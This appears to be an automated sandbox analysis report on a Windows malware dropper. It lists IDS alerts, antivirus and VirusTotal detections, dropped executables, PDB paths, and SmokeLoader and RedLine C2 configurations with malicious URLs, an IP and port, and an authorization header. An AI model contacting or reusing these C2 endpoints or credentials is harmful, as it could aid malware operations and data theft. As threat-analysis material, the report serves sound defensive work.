                  Timestamp:2024-08-21T10:58:54.322701+0200
                  SID:2850107
                  Severity:1
                  Source Port:60018
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:54.322701+0200
                  SID:2850938
                  Severity:1
                  Source Port:60018
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:28.289954+0200
                  SID:2850107
                  Severity:1
                  Source Port:60088
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:28.289954+0200
                  SID:2850938
                  Severity:1
                  Source Port:60088
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:45.053323+0200
                  SID:2803305
                  Severity:3
                  Source Port:60058
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:51.243221+0200
                  SID:2850107
                  Severity:1
                  Source Port:60061
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:51.243221+0200
                  SID:2850938
                  Severity:1
                  Source Port:60061
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeAvira: detected
                  Source: http://lecanardstsornin.com/upload/Avira URL Cloud: Label: malware
                  Source: https://t.gogamec.com/osAvira URL Cloud: Label: phishing
                  Source: https://t.gogamec.com/psAvira URL Cloud: Label: malware
                  Source: http://wfsdragon.ru/api/setStats.phpAvira URL Cloud: Label: phishing
                  Source: http://camasirx.com/upload/Avira URL Cloud: Label: phishing
                  Source: https://t.gogamec.com:443/2302/sqlite.date.datAvira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_2Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_1Avira URL Cloud: Label: malware
                  Source: https://t.gogamec.com:443/2302/sqlite.dat02/sqlite.datAvira URL Cloud: Label: phishing
                  Source: http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139Avira URL Cloud: Label: phishing
                  Source: https://niemannbest.meAvira URL Cloud: Label: malware
                  Source: https://t.gogamec.com//yAvira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_7Avira URL Cloud: Label: malware
                  Source: https://t.gogamec.com/2302/sqlit.~Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_4Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_3Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_6Avira URL Cloud: Label: malware
                  Source: https://niemannbest.me/?username=p11_5Avira URL Cloud: Label: malware
                  Source: http://hsiens.xyz/Avira URL Cloud: Label: phishing
                  Source: https://t.gogamec.com:443/2302/sqlite.dats://t.gogamec.com/2302/sqlite.datAvira URL Cloud: Label: phishing
                  Source: https://t.gogamec.com/2302/sqlite.dat&r3Avira URL Cloud: Label: malware
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exeAvira: detection malicious, Label: HEUR/AGEN.1312411
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeAvira: detection malicious, Label: HEUR/AGEN.1323370
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeAvira: detection malicious, Label: HEUR/AGEN.1316578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeAvira: detection malicious, Label: HEUR/AGEN.1311469
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeAvira: detection malicious, Label: TR/Redcap.vadxp
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeAvira: detection malicious, Label: HEUR/AGEN.1316578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeAvira: detection malicious, Label: HEUR/AGEN.1316578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeAvira: detection malicious, Label: HEUR/AGEN.1305985
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeAvira: detection malicious, Label: HEUR/AGEN.1318610
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeAvira: detection malicious, Label: HEUR/AGEN.1323370
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEAvira: detection malicious, Label: TR/Redcap.vadxp
                  Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2020, "C2 list": ["http://lecanardstsornin.com/upload/", "http://m3600.com/upload/", "http://camasirx.com/upload/"]}
                  Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "135.181.129.119:4805", "Bot Id": "she", "Authorization Header": "b69102cdbd4afe2d3159f88fb6dac731"}
                  Source: gmpeople.comVirustotal: Detection: 11%Perma Link
                  Source: wfsdragon.ruVirustotal: Detection: 9%Perma Link
                  Source: hsiens.xyzVirustotal: Detection: 11%Perma Link
                  Source: t.gogamec.comVirustotal: Detection: 13%Perma Link
                  Source: topniemannpickshop.ccVirustotal: Detection: 12%Perma Link
                  Source: buy-fantasy-football.com.sgVirustotal: Detection: 10%Perma Link
                  Source: all-mobile-pa1ments.com.mxVirustotal: Detection: 11%Perma Link
                  Source: niemannbest.meVirustotal: Detection: 10%Perma Link
                  Source: ggg-cl.bizVirustotal: Detection: 9%Perma Link
                  Source: https://all-mobile-pa1ments.com.mx/Virustotal: Detection: 10%Perma Link
                  Source: http://lecanardstsornin.com/upload/Virustotal: Detection: 11%Perma Link
                  Source: http://wfsdragon.ru/api/setStats.phpVirustotal: Detection: 11%Perma Link
                  Source: http://45.9.20.13/partner/loot.php?pub=mixone8Virustotal: Detection: 6%Perma Link
                  Source: http://wfsdragon.ru/Virustotal: Detection: 9%Perma Link
                  Source: https://topniemannpickshop.ccVirustotal: Detection: 13%Perma Link
                  Source: http://camasirx.com/upload/Virustotal: Detection: 12%Perma Link
                  Source: https://niemannbest.me/?username=p11_1Virustotal: Detection: 13%Perma Link
                  Source: https://niemannbest.me/?username=p11_2Virustotal: Detection: 12%Perma Link
                  Source: http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139Virustotal: Detection: 14%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeReversingLabs: Detection: 91%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeReversingLabs: Detection: 92%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeReversingLabs: Detection: 80%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeReversingLabs: Detection: 80%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeReversingLabs: Detection: 84%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeReversingLabs: Detection: 84%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeReversingLabs: Detection: 57%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeReversingLabs: Detection: 88%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeReversingLabs: Detection: 88%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurl.dllReversingLabs: Detection: 13%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dllReversingLabs: Detection: 18%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dllReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Local\Temp\r6f7sE.IReversingLabs: Detection: 73%
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Roaming\bgjifesReversingLabs: Detection: 88%
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeReversingLabs: Detection: 71%
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeVirustotal: Detection: 68%Perma Link
                  Source: Yara matchFile source: 19.0.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.320451a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.320451a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31d6d4a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17c604381c7047e.exe PID: 7940, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEJoe Sandbox ML: detected
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeJoe Sandbox ML: detected

                  Compliance

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeUnpacked PE file: 26.2.Mon1785436ae78.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exeUnpacked PE file: 29.2.Mon179e1058f256.exe.400000.0.unpack
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:59938 version: TLS 1.0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49736 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:59963 version: TLS 1.2
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.00000000018D4000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbeH source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.0000000001895000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\neyicuyim\povig_bum_j.pdbpEp source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000000.1719311767.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Mon179e1058f256.exe.1.dr
                  Source: Binary string: -C:\wuye\yajiwixifava\jayawoduta_jeyifucanor\kuhitoguzepuwu\bi.pdbpE source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000000.1716147888.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Mon1785436ae78.exe.1.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17e1fac3fd3d84b.exe, 00000015.00000002.1815283502.0000000000118000.00000002.00000001.01000000.00000010.sdmp, Mon17e1fac3fd3d84b.exe, 00000015.00000000.1712134912.0000000000118000.00000002.00000001.01000000.00000010.sdmp, 09xU.exE, 00000026.00000000.1793041267.0000000000748000.00000002.00000001.01000000.00000020.sdmp, 09xU.exE, 00000026.00000002.1956857652.0000000000748000.00000002.00000001.01000000.00000020.sdmp, Mon17e1fac3fd3d84b.exe.1.dr
                  Source: Binary string: em.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BDD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4146627363.0000000000194000.00000004.00000010.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4147052566.00000000008F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\neyicuyim\povig_bum_j.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000000.1719311767.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, Mon179e1058f256.exe.1.dr
                  Source: Binary string: C:\projects\controlzex\src\ControlzEx\obj\Release\NET45\ControlzEx.pdbL source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr
                  Source: Binary string: C:\tabosamifoma60\cukatopeh.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17f45359eb9.exe, 00000018.00000002.1984751493.0000000000409000.00000020.00000001.01000000.00000014.sdmp, Mon17f45359eb9.exe, 00000018.00000000.1714843560.0000000000401000.00000020.00000001.01000000.00000014.sdmp, bgjifes.47.dr, Mon17f45359eb9.exe.1.dr
                  Source: Binary string: ?C:\tabosamifoma60\cukatopeh.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17f45359eb9.exe, 00000018.00000002.1984751493.0000000000409000.00000020.00000001.01000000.00000014.sdmp, Mon17f45359eb9.exe, 00000018.00000000.1714843560.0000000000401000.00000020.00000001.01000000.00000014.sdmp, bgjifes.47.dr, Mon17f45359eb9.exe.1.dr
                  Source: Binary string: System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\wuye\yajiwixifava\jayawoduta_jeyifucanor\kuhitoguzepuwu\bi.pdb source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000000.1716147888.0000000000401000.00000020.00000001.01000000.00000016.sdmp, Mon1785436ae78.exe.1.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbtZrq source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb3t source: Mon179e1058f256.exe, 0000001D.00000002.4154945181.0000000001895000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\projects\controlzex\src\ControlzEx\obj\Release\NET45\ControlzEx.pdb source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000000.1714670479.00000000009EC000.00000002.00000001.01000000.00000013.sdmp, Mon17b5f403be4d8d6b.exe.1.dr

                  Spreading

                  barindex
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.0.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00404B47 FindFirstFileW,1_2_00404B47
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libwinpthread-1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_004995D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then sub esp, 1Ch2_2_00492160
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_00410260
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push edi2_2_004622C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push edi2_2_004622C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebx2_2_004622C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push edi2_2_0042A3F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push esi2_2_00488620
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then sub esp, 1Ch2_2_00464714
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then sub esp, 1Ch2_2_00426733
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_0045E864
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_00446B30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EB90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EC20
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040ECB1
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040ED09
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EDC9
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EDF3
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_00420D80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_00454D80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040ED90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EE0C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EE30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EEC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EF40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EFC5
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EFF0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040EF90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then sub esp, 1Ch2_2_0041D050
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then sub edx, 01h2_2_0041D030
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then mov eax, dword ptr [ecx]2_2_0042B0E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F1C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then sub esp, 1Ch2_2_004751F4
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then mov dword ptr [ecx], 004AB654h2_2_0047D1F2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebx2_2_00471267
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F269
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebx2_2_0047136B
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0041144C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F42C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push ebp2_2_0047143A
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_00411490
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F4A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F5E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then mov dword ptr [ecx], 004AB688h2_2_0047D5F3
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push edi2_2_00481590
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then jmp 004014E0h2_2_0040F650
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then mov eax, dword ptr [ecx]2_2_00421630
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 4x nop then push esi2_2_00485750
